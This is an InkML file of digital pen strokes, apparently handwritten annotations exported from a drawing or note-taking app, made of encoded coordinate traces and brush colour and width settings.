  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 4814 24575,'0'-2'0,"1"0"0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,1-1 0,-1 1 0,3-2 0,32-24 0,-19 15 0,198-165 0,-208 172 0,0 0 0,0-1 0,-1 0 0,0-1 0,0 0 0,0 1 0,-1-2 0,0 1 0,-1-1 0,1 1 0,-1-1 0,-1-1 0,0 1 0,4-15 0,16-61 0,-15 58 0,-1-1 0,-1 0 0,-1 0 0,2-35 0,-4 22 0,8-44 0,-5 46 0,2-55 0,-9-557 0,0 629 0,-2-1 0,-7-36 0,4 35 0,2 0 0,-1-27 0,5-244 0,1 136 0,-2 137 0,-2-1 0,-7-36 0,4 35 0,2 0 0,-1-27 0,5 31 0,-1-15 0,-1 1 0,-11-62 0,8 65 0,1-1 0,2 1 0,2-59 0,-1-29 0,-12 49 0,8 51 0,2 0 0,-3-20 0,4-266 0,4 157 0,-1 131 0,1 0 0,1 1 0,0-1 0,1 1 0,1-1 0,1 1 0,11-23 0,-8 19 0,-1 0 0,-1-1 0,7-33 0,-11 37 0,0 0 0,1 0 0,1 0 0,6-15 0,-8 26 0,-1 0 0,1 0 0,-1 1 0,1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 1 0,9-5 0,16-7 0,-1-1 0,38-26 0,-31 14 0,-27 20 0,0 0 0,1 0 0,-1 1 0,17-7 0,2 2 0,0 2 0,35-7 0,12-3 0,95-42 0,-118 46 0,-1-3 0,-2-2 0,83-44 0,-123 59 0,1 1 0,0 0 0,1 1 0,-1 0 0,0 0 0,17-1 0,-17 3 0,0 0 0,0-2 0,0 1 0,0-1 0,-1 0 0,19-10 0,-12 4 0,21-15 0,1 2 0,1 1 0,1 2 0,67-21 0,118 0 0,-204 36 0,-1 0 0,39-15 0,-40 13 0,0 0 0,1 0 0,23-2 0,-26 5 0,-1 0 0,1-1 0,-1-1 0,22-10 0,8-2 0,-30 13 0,-1 0 0,1 2 0,16-2 0,35-6 0,-31-1 0,-1-1 0,38-18 0,-44 18 0,35-8 0,-46 15 0,-1 0 0,1-1 0,-1-1 0,0 0 0,-1-2 0,29-18 0,-33 18 34,1 2-1,0-1 1,20-8-1,24-13-1532,-43 19-5327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30:01.691"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.025" units="cm"/>
      <inkml:brushProperty name="height" value="0.025" units="cm"/>
      <inkml:brushProperty name="color" value="#AB008B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'2'3'0,"0"1"0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 0 0,1 0 0,6 4 0,6 5 0,15 17 0,-1 2 0,43 56 0,-53-59 0,2-1 0,1-1 0,1-1 0,1-1 0,35 25 0,-56-45 0,0-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 0 0,1 0 0,-2 0 0,1 1 0,0-1 0,-1 1 0,0 0 0,1-1 0,-2 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-2 3 0,-8 9 10,0-2-1,-1 1 0,-26 22 0,22-21-10,-27 31 1,39-40-156,0 0 0,0-1 1,1 2-1,0-1 0,1 0 1,0 1-1,0 0 1,-4 15-1,4-3-6670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30:05.679"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.025" units="cm"/>
      <inkml:brushProperty name="height" value="0.025" units="cm"/>
      <inkml:brushProperty name="color" value="#AB008B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">3 1875 24575,'-2'-109'0,"5"-122"0,-1 218 0,0 0 0,1 0 0,1 1 0,0 0 0,8-16 0,-7 15 0,1 0 0,-2-1 0,7-27 0,-9 28 0,0 1 0,2 0 0,-1 0 0,2 0 0,-1 0 0,12-19 0,23-55 0,-32 67 0,2-1 0,0 2 0,0-1 0,2 1 0,0 1 0,19-22 0,-8 11 0,10-9 0,-22 27 0,0 1 0,-1-1 0,0-1 0,0 0 0,-1 0 0,8-16 0,31-77 0,-43 97 0,0 0 0,0-1 0,1 2 0,1-1 0,-1 0 0,12-10 0,6-7 0,-15 16 0,-1 0 0,1 1 0,0 0 0,0 0 0,1 1 0,0 1 0,0-1 0,14-5 0,8-1 0,43-12 0,-69 23 0,2-2 0,0 0 0,-1 0 0,1-1 0,0 0 0,10-8 0,20-12 0,-28 20 0,-1-1 0,1-1 0,-1 0 0,0 0 0,0-1 0,12-12 0,-12 10 0,0 2 0,0 1 0,1 0 0,-1 1 0,15-8 0,24-16 0,-40 23 0,1 0 0,-1 1 0,1 0 0,0 0 0,0 1 0,0 0 0,1 1 0,-1-1 0,15-2 0,175-49 0,-154 44 0,-28 6 0,0 1 0,22-3 0,-13 3 0,-1-1 0,47-15 0,-50 12 0,1 2 0,0 0 0,0 2 0,23-3 0,-16 5 0,35-9 0,-37 5 0,50-3 0,-48 7 0,0-2 0,0-1 0,38-12 0,-39 9 0,0 1 0,1 2 0,42-3 0,-18 8 0,-33 1 0,0-1 0,0 0 0,0-2 0,35-7 0,79-27 0,-114 32 0,0 1 0,0 1 0,36 0 0,-35 2 0,-1-1 0,0 0 0,35-8 0,-3-6 0,-28 7 0,0 2 0,1 0 0,-1 2 0,35-3 0,-8 2-1365,-33-1-5461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30:07.031"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.025" units="cm"/>
      <inkml:brushProperty name="height" value="0.025" units="cm"/>
      <inkml:brushProperty name="color" value="#AB008B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">99 1 24575,'0'2'0,"1"-1"0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,1 0 0,1 2 0,25 19 0,-17-14 0,182 171 0,-191-176 0,1-1 0,-1 0 0,0 1 0,1 0 0,-1-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,-1 5 0,-2-2 0,0 1 0,0-1 0,0 0 0,-1 0 0,0 0 0,0-1 0,0 0 0,-1 0 0,1 0 0,-1-1 0,-11 7 0,-1 0 0,4-2 0,-1 0 0,-31 12 0,38-17 0,0-1 0,1 2 0,0-1 0,-11 9 0,-21 12 0,29-19 16,0 0-1,0 1 0,1 1 0,0 0 1,-14 15-1,-12 10-1472,22-22-5369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30:11.192"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.025" units="cm"/>
      <inkml:brushProperty name="height" value="0.025" units="cm"/>
      <inkml:brushProperty name="color" value="#AB008B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 850 24575,'3'-1'0,"1"0"0,-1 0 0,0 0 0,0-1 0,1 1 0,-1-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,3-4 0,21-13 0,10 3 0,105-38 0,-118 46 0,1 2 0,-1 1 0,1 1 0,27-2 0,-46 6 0,0 0 0,0-1 0,1 0 0,-1 0 0,0-1 0,-1 1 0,1-1 0,0-1 0,0 1 0,-1-1 0,0 0 0,1 0 0,4-4 0,1 1 0,0 1 0,0 0 0,0 1 0,1 0 0,0 1 0,0 0 0,0 1 0,0 0 0,0 1 0,13 1 0,-3-2 0,39-7 0,60-31 0,-91 28 0,0 2 0,0 1 0,1 1 0,0 2 0,35-3 0,-52 7 0,0 0 0,0 0 0,-1-1 0,1-1 0,-1-1 0,14-6 0,18-5 0,-30 12 0,1 0 0,-1 1 0,17 0 0,35-8 0,-44 7 0,0 0 0,44-1 0,-43 4 0,-1-1 0,44-9 0,37-8 0,-17 4 0,-42 8 0,-1 3 0,1 1 0,82 5 0,-31 0 0,-95-2 0,35 1 0,1-2 0,0-1 0,60-13 0,44-15 0,-120 26 0,1 1 0,-1 1 0,29 1 0,-30 1 0,1-1 0,0-1 0,35-7 0,-21-1 0,0-2 0,38-20 0,-61 28 0,1-1 0,0 2 0,0 0 0,19-3 0,23-4 0,-33 5 0,43-4 0,-48 8 0,-1-1 0,1 0 0,-1-2 0,0 0 0,20-7 0,-15 3 0,1 2 0,-1 0 0,1 1 0,0 2 0,1 0 0,42 0 0,-2 0 0,27-10-11,-60 8-375,47-3 0,519 6 909,-288 4-263,-159 0-444,164-4-522,-204-12-37,-70 8 471,58-3-1,-39 6 273,61-11 0,-46 4 0,4 0 80,-15 1 206,85-1-1,-106 9 13,61-12 0,-59 7-233,52-2-1,830 8-848,-409 1 179,-499-2 590,-1 0 1,1-2-1,23-6 1,-21 4-2,1 1 0,19-1 1,303 2 1735,-176 5-1144,1408-2-1163,-1546 2 587,1 0 0,35 9 0,-34-5 0,51 3 0,-19-8 80,-40-3-16,0 2-1,-1 1 0,1 1 1,0 0-1,-1 2 1,0 1-1,26 8 0,-21-4-58,1-2 0,-1-1 0,1-1 0,46 3 0,-37-5-97,-1 2 0,36 9 0,-27-4-562,0-1-1,61 3 1,55 15 654,-116-17 0,1-2 0,67 3 0,-58-11 113,-26-1 131,1 2 0,0 0 0,0 2 0,-1 1 0,52 14 0,-24-1 377,-37-12-618,0 1 0,-1 0-1,1 1 1,-1 1 0,32 21-1,87 60-2,-107-71 0,0-2 0,59 24 0,-61-30 0,0 2 0,-1 1 0,-1 1 0,41 29 0,27 30-601,112 64 1,-142-102 600,78 29 0,-77-37 0,85 50 0,-16-8-128,-54-30 8,216 118 268,-211-118 1127,-53-25-1262,52 30 0,-36-10-13,-1 2 0,-1 2 0,-2 2 0,-2 2 0,50 65 0,-79-90 0,1-1 0,1 0 0,0-1 0,31 22 0,-25-20 0,0 0 0,-2 2 0,0 0 0,22 29 0,-22-24 0,1-2 0,1 0 0,25 20 0,-24-26 0,-1 2 0,-1 0 0,0 1 0,32 42 0,-38-43 0,1 0 0,1-2 0,0 0 0,36 27 0,-35-28 0,0 1 0,23 28 0,-26-27 0,1 0 0,33 26 0,-34-31 0,-1 1 0,0 0 0,13 19 0,8 7 0,2 2 0,-25-27 0,1 0 0,23 21 0,31 14 0,-39-30 0,0 2 0,23 23 0,-31-28 0,0 0 0,0-2 0,2-1 0,43 22 0,-15-8 0,-23-14 0,51 18 0,-48-20 0,37 19 0,-34-15 0,1-2 0,0-1 0,2-1 0,-1-2 0,1-1 0,0-2 0,38 2 0,-54-7 0,-1 1 0,1 1 0,0 0 0,-1 2 0,0 0 0,0 1 0,0 1 0,-1 0 0,17 11 0,-8-3 0,-8-6 0,0 2 0,-1 0 0,0 1 0,18 17 0,-33-27 0,1 1 0,0 0 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,0 0 0,1 0 0,-2-1 0,1 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,-1 1 0,-1 3 0,-8 14-1365,-1-3-5461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30:12.570"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.025" units="cm"/>
      <inkml:brushProperty name="height" value="0.025" units="cm"/>
      <inkml:brushProperty name="color" value="#AB008B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">460 1 24575,'1'26'0,"0"-1"0,2 1 0,10 47 0,-4-12 0,-9-50 0,1-1 0,0 0 0,0 0 0,1 0 0,1 0 0,0-1 0,0 1 0,9 16 0,-8-19 0,5 7 0,0 1 0,0 1 0,-2-1 0,10 27 0,-16-38 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,-3 4 0,-10 4 0,0-1 0,0 0 0,-1-1 0,0-1 0,-28 9 0,27-11 0,0 1 0,1 1 0,0 1 0,1 0 0,-25 16 0,32-17 0,-1-1 0,0-1 0,-19 8 0,-23 14 0,-12 9 0,47-28 0,1 1 0,-29 20 0,29-16-1365,1-2-5461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41:50.967"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">959 3308 24575,'-4'-1'0,"0"-1"0,-1 0 0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,1-1 0,0 1 0,-6-8 0,0 2 0,-19-19 0,6 7 0,0 0 0,-28-40 0,22 26 0,20 27 0,1-1 0,0-1 0,-10-15 0,5 0 0,7 14 0,0 1 0,-1-1 0,0 1 0,-1 0 0,-9-10 0,10 12 0,0 1 0,1-1 0,-8-14 0,-9-14 0,13 24 0,-6-9 0,-30-29 0,31 34 0,-24-32 0,-13-14 0,32 43 0,12 13 0,0 0 0,0-1 0,0 0 0,1 0 0,0-1 0,0 0 0,1 0 0,0 0 0,0-1 0,1 1 0,-6-18 0,8 18 0,-2-1 0,1 1 0,-1 1 0,-1-1 0,1 1 0,-1-1 0,-1 1 0,-5-6 0,4 5 0,0-1 0,1 1 0,0-1 0,1 0 0,-5-11 0,4 7 0,-1 0 0,0 1 0,-17-24 0,16 26 0,0-1 0,1 0 0,1 0 0,0-1 0,-6-14 0,-64-164 0,64 162 0,1 0 0,2 0 0,1-1 0,1-1 0,-4-37 0,0-15 0,5 43 0,-2-61 0,9-235 0,1 317 0,0-1 0,8-34 0,-1 10 0,-4 21 0,1 0 0,1 0 0,1 1 0,1 0 0,1 0 0,0 1 0,24-32 0,-20 27 0,18-42 0,-23 46 0,1 1 0,0 0 0,23-31 0,-4 10 0,-17 24 0,0 0 0,22-21 0,31-31 0,110-59 0,-154 114 0,76-42 0,-88 52 0,0 0 0,0 0 0,0 1 0,16-3 0,-13 3 0,-1 0 0,21-9 0,-20 7 0,0 1 0,0 0 0,0 1 0,17-2 0,-16 3 0,-1-1 0,0 0 0,0 0 0,18-9 0,-17 5 0,0 0 0,0 1 0,0 1 0,1 0 0,0 1 0,0 0 0,0 1 0,0 1 0,19-1 0,-9 2 0,-1-1 0,1-1 0,-1-1 0,0-1 0,0-1 0,-1-1 0,33-15 0,-41 17 0,-1 0 0,1 1 0,28-3 0,-26 4 0,0 0 0,30-10 0,-29 7 0,0 2 0,0 0 0,0 0 0,1 2 0,30-1 0,-23 2 0,0-1 0,25-6 0,-22 2 0,1-2 0,1 2 0,0 1 0,43-1 0,-49 4 0,-1-1 0,1-1 0,-1-1 0,24-8 0,15-3 0,44-12-1365,-93 23-5461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41:52.765"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'3'0'0,"-1"1"0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 1 0,0 0 0,0-1 0,4 5 0,15 9 0,0-7 0,-1 2 0,0 0 0,-1 1 0,0 2 0,0-1 0,18 18 0,-30-24 0,0 0 0,0-1 0,15 7 0,-17-9 0,0-1 0,0 1 0,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,4 7 0,-6-7 0,1 0 0,0 0 0,0 0 0,0 0 0,1-1 0,0 0 0,6 6 0,-7-7 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 4 0,0 5 0,-1 0 0,0 0 0,-1 0 0,0 0 0,-1 0 0,0 0 0,-1-1 0,0 1 0,-1 0 0,0-1 0,-1 1 0,0-1 0,-1 0 0,0 0 0,-1-1 0,0 0 0,-1 0 0,-9 12 0,-1-2 0,9-10 0,-1 0 0,0 0 0,-12 10 0,15-14 14,0 1-1,0-1 0,0 1 1,1 1-1,0-1 0,1 1 1,-1 0-1,2 0 0,-4 9 1,3-7-264,-1 0 0,0 0 0,0-1 1,-1 0-1,-9 12 0,5-11-6576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25:01.271"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">7131 0 24575,'-1'1'0,"-1"-1"0,1 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,-1 2 0,-16 32 0,14-27 0,-22 44 0,-54 76 0,49-98 0,5-7 0,17-14 0,0 0 0,-1-1 0,-13 9 0,15-11 0,-1 0 0,1 1 0,0 0 0,1 0 0,-12 14 0,5-3 0,-1 0 0,-1-1 0,0-1 0,-1 0 0,-32 21 0,-102 53 0,113-68 0,-7 4 0,-57 29 0,4-3 0,67-34 0,0-1 0,-62 22 0,75-32 0,0 1 0,0 1 0,0 1 0,1 0 0,-18 15 0,-17 10 0,42-28 0,0 0 0,-16 17 0,-6 4 0,-8 5 0,29-23 0,0 0 0,0-2 0,-1 1 0,0-1 0,0-1 0,-1 0 0,0-1 0,-15 6 0,7-4 0,0 1 0,1 0 0,0 2 0,0 1 0,-30 23 0,28-19 0,0 0 0,-1-2 0,-38 17 0,17-14 0,-24 10 0,-82 45 0,129-62 0,0-2 0,-1 0 0,0-1 0,0-1 0,0-1 0,-26 2 0,-60 15 0,30-2 0,44-13 0,-49 19 0,66-21 0,-1 0 0,-1-2 0,1 0 0,0-1 0,-1 0 0,1-2 0,-22-1 0,18 0 0,0 1 0,0 1 0,1 0 0,-34 8 0,-71 16 38,84-19-332,-66 20 1,-43 11 161,66-19 154,-140 28-581,191-39 627,0 2 0,1 2 0,0 0 0,0 2 0,-32 19 0,19-9 48,-64 20 0,-16 1-119,-60 18 584,72-42-581,81-16 0,0 1 0,1 2 0,-49 17 0,65-19-24,-1 0 0,1-2 0,-1 0 0,0 0-1,-18-1 1,18-1-82,-1 1 0,1 0-1,-1 1 1,-27 9 0,-74 25 106,14-5 0,-61 16 0,77-24 0,63-15 370,-50 24 1,56-22-387,-1-2 0,-1 0-1,-32 8 1,27-9 16,0 0 0,-29 15 0,36-14 0,0-1 0,0-1 0,-1-1 0,-41 7 0,50-11 0,0 0 0,0 1 0,0 0 0,1 1 0,-1 0 0,1 1 0,0 0 0,0 1 0,0 0 0,-11 9 0,-8 9 0,-52 52 0,75-68 0,-1-1 0,0-1 0,0 0 0,-1 0 0,-16 8 0,16-10 0,0 1 0,0 0 0,1 1 0,0 0 0,-8 7 0,9-7 0,1 0 0,-1-1 0,0 0 0,-1-1 0,-12 7 0,13-8 0,1 0 0,-1 1 0,1-1 0,0 2 0,0-1 0,0 1 0,1 0 0,-7 6 0,-3 7 0,-2-1 0,-30 25 0,-4 2 0,-16 13 0,49-43 0,0 1 0,1 0 0,-29 35 0,8-3 0,25-33 0,1 1 0,0 1 0,1 0 0,1 0 0,1 1 0,0 0 0,-7 21 0,11-27 0,-1 0 0,0 0 0,0 0 0,-1-1 0,0 0 0,-17 17 0,-19 28 0,21-16 0,12-21 0,0 0 0,-1-1 0,-24 27 0,23-28 0,0 1 0,0 0 0,2 0 0,0 1 0,-9 25 0,13-30 0,3-7 0,-1 0 0,1-1 0,-1 0 0,0 0 0,-5 5 0,5-6 0,0 0 0,1 0 0,0 0 0,-1 1 0,2 0 0,-1-1 0,0 1 0,-1 6 0,-4 11 0,-1 0 0,-17 31 0,16-33 0,2 1 0,0-1 0,2 1 0,0 1 0,1-1 0,-2 27 0,3-29 0,-1 0 0,-1 0 0,-1 0 0,-14 29 0,11-28 0,1 2 0,-11 37 0,14-38-1365,-1-4-5461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37.027"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">40 1 24575,'2'0'0,"0"0"0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,0 1 0,25 38 0,-5-6 0,-19-32 0,0 1 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,-2 6 0,2-5 0,-1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,1-1 0,-11 3 0,-5-2-1365,1-2-5461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0:49.935"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">5900 1303 24575,'-1'-2'0,"1"1"0,-1-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-3-1 0,-26-11 0,3 4 0,11 5 0,1-1 0,-28-14 0,-109-49 0,12 6 0,115 52 0,-109-46 0,126 52 0,-1 0 0,1-1 0,0 0 0,0-1 0,1 1 0,-13-12 0,13 10 0,0 0 0,-1 1 0,0 0 0,0 1 0,-1-1 0,-12-4 0,5 5 0,0 0 0,-29-4 0,27 6 0,1 0 0,-24-9 0,-15-6 0,37 13 0,0-1 0,-30-14 0,37 15 0,-1 0 0,1 1 0,-1 1 0,1 0 0,-1 1 0,0 1 0,0-1 0,0 2 0,-16 1 0,9-1 0,0-1 0,-34-5 0,-84-25 0,91 26 0,1 2 0,-77 5 0,32 0 0,-41-13 0,88 5 0,-47 0 0,69 6 0,-22 1 0,0-2 0,-69-11 0,75 7 0,0 1 0,0 3 0,-43 2 0,-59-2 0,66-9 0,46 5 0,-48-2 0,36 5 0,-51-10 0,25 3 0,5-1 0,38 5 0,0 2 0,-29-1 0,-617 5 0,653-3 0,-1 0 0,1 0 0,0-2 0,0 0 0,-20-8 0,-24-6 0,-3 3 0,34 6 0,-1 2 0,0 1 0,1 2 0,-36-1 0,64 5 0,-60 0 0,-109-13 0,-5-10 0,131 19 0,-64 1 0,-3 1 0,40-9 0,48 7 0,-38-3 0,29 5 0,-31-7 0,33 4 0,-45-1 0,59 6 0,0-1 0,0-1 0,1 0 0,-1-1 0,1 0 0,-1-1 0,1-1 0,0-1 0,-20-10 0,8 2 0,18 10 0,0 0 0,0-1 0,1 0 0,0 0 0,0-1 0,-13-12 0,-22-21 0,32 31 0,1-1 0,0 0 0,1 0 0,-13-18 0,-5-10 0,7 9 0,-29-52 0,45 71 0,2 1 0,-1-1 0,1 1 0,0-1 0,-1-14 0,3 15 0,-1 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,-1 0 0,1 0 0,-6-10 0,7 16 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0 0 0,1-1 0,-2 2 0,-32 32 0,26-24 0,-10 10 0,2 2 0,0 0 0,1 1 0,1 1 0,1 0 0,-12 30 0,22-43 120,3-11-143,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,1 0-1,-1 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 1 0,0-1 0,0 0-1,0 0 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0:51.214"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 46 24575,'30'-1'0,"-1"-2"0,1-1 0,55-15 0,-58 13-273,0 1 0,-1 1 0,1 1 0,48 2 0,-55 2-6553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0:58.859"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">785 68 24575,'-8'1'0,"0"1"0,-1-1 0,1 2 0,0-1 0,1 1 0,-1 0 0,-13 7 0,-16 7 0,30-15 0,0 1 0,0 1 0,1-1 0,-1 1 0,1 0 0,0 1 0,0 0 0,0-1 0,1 2 0,0-1 0,-8 10 0,6-6 0,1-3 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,-1-1 0,1 1 0,-16 4 0,4-3 0,0 0 0,-39 3 0,51-8 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 1 0,0 0 0,-1 1 0,1-1 0,1 1 0,-1 1 0,0-1 0,-7 7 0,-34 20 0,-1-2 0,-57 24 0,77-41 0,23-8 0,0-1 0,0 0 0,0 1 0,0 0 0,-8 6 0,12-7 0,-1 0 0,1 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1 4 0,-2 38 0,4 86 0,2-39 0,-3-82 0,1 0 0,-1 0 0,2 0 0,-1 0 0,1 0 0,1 0 0,0-1 0,0 1 0,1-1 0,6 11 0,-6-14 0,0 1 0,1-1 0,0 0 0,0 0 0,1-1 0,-1 1 0,1-1 0,0 0 0,1-1 0,-1 0 0,1 0 0,0 0 0,11 4 0,53 23 0,-37-15 0,1-1 0,40 10 0,46-2 0,-84-18 0,-1-1 0,1-1 0,73-5 0,-27-1 0,341 3 0,-411 1 0,0 1 0,0 0 0,0 1 0,-1 0 0,24 9 0,-23-7 0,0-1 0,0 0 0,1-1 0,-1 0 0,20 1 0,392-5 0,-403 2 0,0 1 0,26 6 0,-24-4 0,38 3 0,227-7 0,-272-1 0,0-1 0,29-7 0,-27 5 0,-1 1 0,21-1 0,-6 3 0,-7 1 0,0-1 0,0-1 0,28-7 0,-18 3 0,1 2 0,-1 2 0,1 1 0,38 3 0,7 1 0,1077-3 0,-1137-2 0,0 0 0,26-6 0,-24 4 0,38-3 0,-37 5 0,-1-1 0,1-2 0,27-8 0,-27 6 0,1 2 0,42-5 0,-53 8 0,-1 0 0,1-1 0,-1-1 0,25-10 0,21-4 0,-48 14 0,0 0 0,21-11 0,21-7 0,-41 18 0,-1 0 0,-1-1 0,1-1 0,14-9 0,-13 7 0,0 1 0,23-9 0,-26 12 0,-1 0 0,0-1 0,0 0 0,15-11 0,-15 9 0,0 0 0,1 2 0,13-8 0,-14 9 0,0-1 0,-1 0 0,1 0 0,8-8 0,-10 7 0,0 1 0,0-1 0,1 2 0,0-1 0,14-5 0,-17 8 0,0 0 0,1-1 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,3-8 0,10-15 0,9 0 0,-23 25 0,1 1 0,0 0 0,-1-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1-1 0,0 1 0,2-6 